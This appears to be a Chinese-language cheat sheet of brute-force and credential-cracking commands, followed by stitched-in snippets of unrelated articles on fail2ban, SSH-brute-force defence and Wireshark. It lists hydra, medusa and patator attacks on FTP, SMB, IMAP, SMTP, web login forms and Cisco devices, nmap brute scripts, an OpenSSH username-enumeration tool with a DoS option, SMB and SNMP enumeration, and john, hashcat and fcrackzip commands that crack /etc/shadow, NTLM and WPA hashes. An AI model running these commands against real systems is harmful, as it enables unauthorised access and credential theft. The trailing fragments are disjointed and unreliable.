暴力破解

SMB: 

enum -D -u administrator -f passwords.txt 服务器名

FTP: 

medusa -H ip.txt -U user.txt -P passwd.txt -M ftp

hydra -l 用户名 -P 密码字典 -e ns -vV IP ftp

 

hydra

破解http-proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18

破解imap:
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

破解cisco:
# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

破解https:
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

破解teamspeak:
# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
Web表单登录破解
get方式提交,破解web登录:
  # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
  # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

post方式提交,破解web登录(不支持验证码)
  hydra -l admin -P pass.lst -o ok.lst -t 1 -f IP http-post-form "/index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>"

  说明:用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,
  -f 是当破解了一个密码就停止,ip就是目标ip  http-post-form表示破解是采用http 的post 方式提交的表单密码破解。  后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义   

针对 OpenSSH 用户进行枚举时序攻击

注:枚举时序攻击(“Enumeration Timing Attack”)属于侧信道攻击/旁路攻击(Side Channel Attack),侧信道攻击是指利用信道外的信息,比如加解密的速度/加解密时芯片引脚的电压/密文传输的流量和途径等进行攻击的方式,一个词形容就是“旁敲侧击”。–
osueta 是一个用于对 OpenSSH 进行时序攻击的 python2 脚本,其可以利用时序攻击枚举 OpenSSH 用户名,并在一定条件下可以对 OpenSSH 服务器进行 DOS 攻击。

# https://github.com/c0r3dump3d/osueta
$ ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes
$ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes –dos no -L userfile.txt

破解

nmap -p 873 --script rsync-brute --script-args ‘rsync-brute.module=www‘ 192.168.1.4   破解rsync 
nmap --script informix-brute -p 9088 192.168.1.4    informix数据库破解 
nmap -p 5432 --script pgsql-brute 192.168.1.4      pgsql破解 
nmap -sU --script snmp-brute 192.168.1.4          snmp破解 
nmap -sV --script=telnet-brute 192.168.1.4        telnet破解

枚举 Samba
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

枚举 SNMP
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP

# SMTP  爆破 (patator)

$ patator smtp_login host=192.168.1.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.1.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.1.129 helo=‘ehlo 192.168.17.128‘ user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.1.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst ­x ignore:fgrep=‘incorrect password or account name‘

MD5破解   (例:md5.txt文件,没有salt的MD5哈希)

   john -format=raw-md5 -pot=./wordlist.pot  md5.txt

   john -format=raw-md5-opencl  -wordlist=wordlist.lst  -rules:Single  md5.txt   (利用GPU加快破解)

Hash破解

hashcat -m 400 -a 0 hash /root/rockyou.txt  破解hash

破解linux密码

john --wordlist=password.lst "/etc/shadow"  #字典模式
john –single "/etc/shadow" #Single模式根据用户名产生变化来进行猜解
john -i:Digits -user:test1 user1  #遍历模式,使用组合密码的所有可能情况参数:
  ALL(0到8个字符长的所有字符组合) Alpha(1到8个字符长的所有字母组合)
  Digits(1到8个字符长的所有数字组合) Alnum(1到8个字符长的所有字母/数字组合)
john -show hashes  忘记密码时可使用类似命令查看已破解的密码
john --restore hashes   在原来的基础上继续破解(破解结果出现问号时)

ZIP密码破解:

(1)fcrackzip爆破 :  fcrackzip -b -l 4-4 -u 1D7.zip -v -c 1
(其中,-b爆破,-l说明密码长度,-u是文件,-v是详细输出,-c是密码字典类型)

oclHashcat

无论是MD5,MSSQL,SHA1还是其他哈希,破解命令都是一条,-m设定哈希类型

破解WPAv2哈希
cudaHashcat-plus64.exe -m 2500 out.hccap 

破解NTLM哈希
cudaHashcat-plus64.exe -m 1000 NTLM.txt path/wordlist.txt 

Metasploit中的一些爆破模块

auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/telnet/telnet_login
auxiliary/scanner/smb/smb_login
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/postgres/postgres_login
auxiliary/scanner/vnc/vnc_login
auxiliary/scanner/pcanywhere/pcanywhere_login
auxiliary/scanner/snmp/snmp_login

 

时间: 2024-11-16 19:10:43

暴力破解的相关文章

防止ssh暴力破解linux密码

网上看到一篇安全方面的文章,常用的网站收藏无法收藏,于是放这里先.具体功能还未测试,请慎用. 下面是博客原文转载,感谢作者辛苦劳动: 服务器在互联网中,每天都有些没事儿干的人在你的机器端口扫来扫去,让管理员非常烦恼.本文描述一个方法,利用本文介绍的脚本结合iptables服务一并使用,用来防止公网计算机通过ssh进行用户口令暴力破解.目前稳重脚本已经在其他项目的实际运营环境中得到验证. 脚本内容: #!/bin/bash # 防SSH密码暴力破解脚本 # 通过分析secure日志文件使用ipta

shadow文件弱口令暴力破解——John

在渗透测试中,这里主要说的是linux系统,我们经常遇到任意文件下载或读取,以及命令执行等,但是命令执行有些时候并没有交互式的,我们想添加账号和密码就会很困难,所以这时我们就可以读取shadow文件,将内容保存到本地,然后使用john来进行破解,从而可使用系统中的账号进行远程连接控制! 下载地址:http://www.openwall.com/john/ 基本使用语法: john shadow [email protected]:~# john /etc/shadow Warning: dete

fail2ban防止暴力破解

暴力破解在公网上是很常见的,当我们在公网上的服务器被暴力破解的时候,我们就的采取相应的措施,今天我们来讲一个开源软件fail2ban,以防止暴力破解. 我们去官网下下载稳定版本的fail2ban安装包. fail2ban官网地址:http://www.fail2ban.org 环境,假设192.168.1.63是公网上的服务器,被别人暴力破解时怎么办呢. 题目: 实战背景: 最近公网网站一直被别人暴力破解sshd服务密码.虽然没有成功,但会导致系统负载很高,原因是在暴力破解的时候,系统会不断地认

【运维小分享】记个人博客网站受针对xmlrpc.php的暴力破解攻击

起因: 今天忽然打开个人blog,就发现打开很慢,然后出现了下图的反馈:服务器服务不可用!waht?刷新了几次都不行,赶紧登陆服务器后台查看情况. 确认攻击: 登陆后台后通过netstat发现连接数极多,相对于平时来说多了好几倍吧,赶紧通过日志load出疯狂访问的ip # cat 2016-12-16-access_log | awk '{print $1}' | sort | uniq -c | sort -rn | head -n 10   30305 191.96.249.53   290

利用Python自动生成暴力破解的字典

Python是一款非常强大的语言.用于测试时它非常有效,因此Python越来越受到欢迎. 因此,在此次教程中我将聊一聊如何在Python中生成字典,并将它用于任何你想要的用途. 前提要求 1,Python 2.7(对于Python 3.x的版本基本相同,你只需要做一些微小调整) 2,Peace of mine(作者开的一个玩笑,这是一首歌名) 如果你用virtualenv搭建Python开发环境,请确保已经安装了itertools.因为我们将会用到itertools生成字典.我们将一步一步地演示

Wireshark黑客发现之旅(4)——暴力破解

Wireshark黑客发现之旅(4)——暴力破解 聚锋实验室 · 2015/08/10 10:33 作者:Mr.Right.K0r4dji 申明:文中提到的攻击方式仅为曝光.打击恶意网络攻击行为,切勿模仿,否则后果自负. 一.个人观点 暴力破解,即用暴力穷举的方式大量尝试性地猜破密码.猜破密码一般有3种方式: 1.排列组合式:首先列出密码组合的可能性,如数字.大写字母.小写字母.特殊字符等:按密码长度从1位.2位……逐渐猜试.当然这种方法需要高性能的破解算法和CPU/GPU做支持. 2.字典破解

Centos6.4 安装fail2ban防暴力破解

Centos6.4 安装fail2ban防暴力破解 一. 安装 curl -O https://codeload.github.com/fail2ban/fail2ban/tar.gz/0.9.0 mv 0.9.0 0.9.0.tar.gz tar zxvf 0.9.0.tar.gz cd fail2ban-0.9.0/ python setup.py build python setup.py install 二.配置(防ssh暴力) vi /etc/fail2ban/jail.conf [s

利用Teensy进行EM410x卡模拟以及暴力破解EM410X类门禁系统可行性猜想

前些天Open入手了Teensy++ 2.0,所以在无聊的情况下研究了Teensy++ 2.0模拟EM410X,并且针对EM410X的门禁进行了一次暴力破解测试,以下就是相关代码以及内容. 什么是低频?什么是EM410x? 首先,我不得不再次提一下那些工作在125khz频率下的低频卡(如:EM410X之类的),以便大家更好的阅读以下的内容. 什么是低频?以下就是低频的解释: 低频(LF, Low frequency)是指频带由30KHz到300KHz的无线电电波.一些无线电频率识别( RFID技

【初学破解】暴力破解绕过程序认证

最近在学习的时候有缘认识到了破解 为了能够略懂~花了点时间在这个上面做了点简单的破解实验~~ 下面将会介绍在破解程序中非常简单的一种破解方法----暴力破解~~~ 正文: ①编写漏洞程序 首先用c语言写了一个小bug程序 代码如下: #include <stdio.h> #include <windows.h> int main(){ int s=0; scanf("%d",&s); if(s == 8){ printf("注册成功!"

DVWA系列の命令注入&amp;暴力破解

Brute Force(暴力测试): 对比难度为Low和high的代码可以发现 相对于Low,High在用户名和密码处分别加了两个过滤函数 Stripslashes: 输入:字符串. 输出:返回一个去除转义反斜线后的字符串(\' 转换为 ' 等等).双反斜线(\\)被转换为单个反斜线(\). mysql_real_escape_string:以下字符前添加反斜杠: \x00, \n, \r, \, ', " 和 \x1a. 代码是用来防止sql注入代码,对暴力破解这一项并没有影响,只不过上面爆破